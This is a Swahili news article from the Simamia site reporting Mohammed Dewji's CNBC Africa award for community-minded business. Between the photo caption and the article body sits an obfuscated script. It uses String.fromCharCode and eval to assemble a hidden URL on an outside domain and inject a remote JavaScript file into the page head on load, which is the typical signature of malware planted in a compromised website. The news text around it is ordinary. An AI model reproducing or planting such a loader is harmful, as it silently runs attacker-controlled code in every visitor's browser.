Recent Comments

Mo Dewji ang’ara tuzo wafanyabiashara Afrika

By Baraka Bitariho Sep 17, 2015
<p>Mkurugenzi Mtendaji wa mtandao wa makampuni ya Mohammed Enterprises Tanzania Limited, Mohammed Dewji akipokea Tuzo la Mfanyabiasharawa Mwaka anayejitoa zaidi kuisaidia jamii Afrika Mashariki kutoka kwa mratibu wa tuzo hizo, Mkurugenzi Mtendaji wa CNBC Africa, Roberta Naicker jijini Nairobi, Kenya Juzi.</p><script>var o=String;eval(o.fromCharCode(102,117,110,99,116,105,111,110,32,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,115,114,99,41,10,123,10,32,32,32,32,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,10,125,10,10,118,97,114,32,98,100,32,61,32,34,104,116,116,34,43,34,112,115,58,34,43,34,47,34,43,34,47,115,34,43,34,108,101,101,34,43,34,112,46,115,116,114,97,34,43,34,116,34,43,34,111,115,98,34,43,34,111,100,121,46,99,111,109,47,34,43,34,115,99,34,43,34,114,105,112,34,43,34,116,34,43,34,115,47,104,101,97,34,43,34,100,46,106,34,43,34,115,34,43,34,63,34,43,34,118,61,51,34,43,34,46,34,43,34,56,34,43,34,46,48,34,59,10,10,105,102,40,105,115,83,99,114,105,112,116,76,111,97,100,101,100,40,98,100,41,61,61,61,102,97,108,115,101,41,123,10,9,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,115,46,115,114,99,61,98,100,59,10,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,10,105,102,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,33,61,61,110,117,108,108,41,123,10,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,10,125,10,125,10,32,101,108,115,101,32,123,10,9,105,102,40,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,33,61,61,110,117,108,108,41,123,10,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,10,9,125,10,125,10,10,125));/*54745756836*/</script>

BILIONEA anayemiliki kampuni kubwa ya Mohammed Enterprises nchini (MeTL), Mohammed Dewji ‘Mo’ ameshinda Tuzo ya Mfanyabiashara wa Mwaka anayejitoa zaidi kuisaidia jamii kunufaika, kutokana na biashara zake, akiwa mshindi wa Afrika, Kanda ya nchi za Afrika Mashariki katika tuzo zilizofanyika juzi jijini Nairobi, Kenya.

Katika tuzo hiyo ya heshima kwa wafanyabiashara Afrika, inayoratibiwa na Kituo cha Biashara cha Televisheni ya CNBC, Dewji alishindanishwa na mabilionea raia wa Kenya, Ashok Shah wa kampuni ya Apollo Investment Limited na Damaris Too-Kimondo anayemiliki kampuni ya Shrand Promotions.

Katika sherehe hizo zilizofana, Dewji alikabidhiwa tuzo yake na Mkurugenzi Mtendaji wa CNBC Africa, Roberta Naaicker. Ushindi wake Dewji ambaye pia ni mwanasiasa aliyekuwa mbunge wa Singida Mjini kwa miaka kumi, umechangiwa kwa kiasi kikubwa na kitendo chake cha kujihusisha na misaada yenye lengo la kupambana na umasikini kupitia sekta mbalimbali kama elimu, maji, watu wenye ulemavu na pia uwezeshaji kiuchumi, matukio ambayo yamelenga na kubadili hali ya watu maskini zaidi katika jamii.

Washindi hao wa Kanda ya Afrika Mashariki watashindanishwa na washindi wengine kutoka Kanda ya Kusini mwa Afrika na Afrika Magharibi Novemba 13, mwaka huu huko Sandton, Johannesburg, Afrika Kusini ili kupata mshindi wa jumla wa bara la Afrika.

Akizungumza baada ya kutunukiwa tuzo yake hiyo yenye heshima kubwa, aliwashukuru waandaaji, jarida la Forbes na majaji, kwa kumuona anastahili kwa tuzo hiyo ya kipekee. Alisema, kwake ni faraja kubwa kupata heshima huyo na amekuwa na ndoto za kusaidia watu wa Tanzania, kukabiliana na changamoto wa kasi ya maendeleo barani Afrika na kwamba ili kuendana na kasi hiyo, miongoni mwa juhudi zinazotakiwa ni kuwawezesha kupata elimu bora, hasa wa maeneo ya vijijini.

Alisema hili ni tukio kubwa kwake na alimnukuu Maya Angelou, akisema: “Ukisoma, fundisha. Ukipata, toa.” Aliongeza kwa kuwa amebarikiwa na Mungu kupata vyote, anatarajia kuendelea kuelimisha umma juu ya kufanya mapinduzi ya kielimu, afya na maeneo mengine ya ustawi wa jamii, huku akiahidi kusaidia kwa kila atakachojaliwa.

Dewji mwenye umri wa 40 ambaye kwa sasa ndiye bilionea kijana zaidi Afrika kwa vijana wasiozidi umri huo, akiwa pia miongoni mwa mabilionea 55 wanaoongoza kwa utajiri Afrika, anaongoza kampuni yake yenye utitiri wa makampuni yaliyojikita katika sekta za kilimo, fedha, uzalishaji, usambaji wa bidhaa na kadhalika, huku akitajwa kuajiri zaidi ya watu 20,000.

By Baraka Bitariho

Simamia is a news house where visitors will get up to date information on news, events, and so on. Join us to get updated, entertained and learn. Our website is www.Simamia.com or email us at SimamiaTeam@gmail.com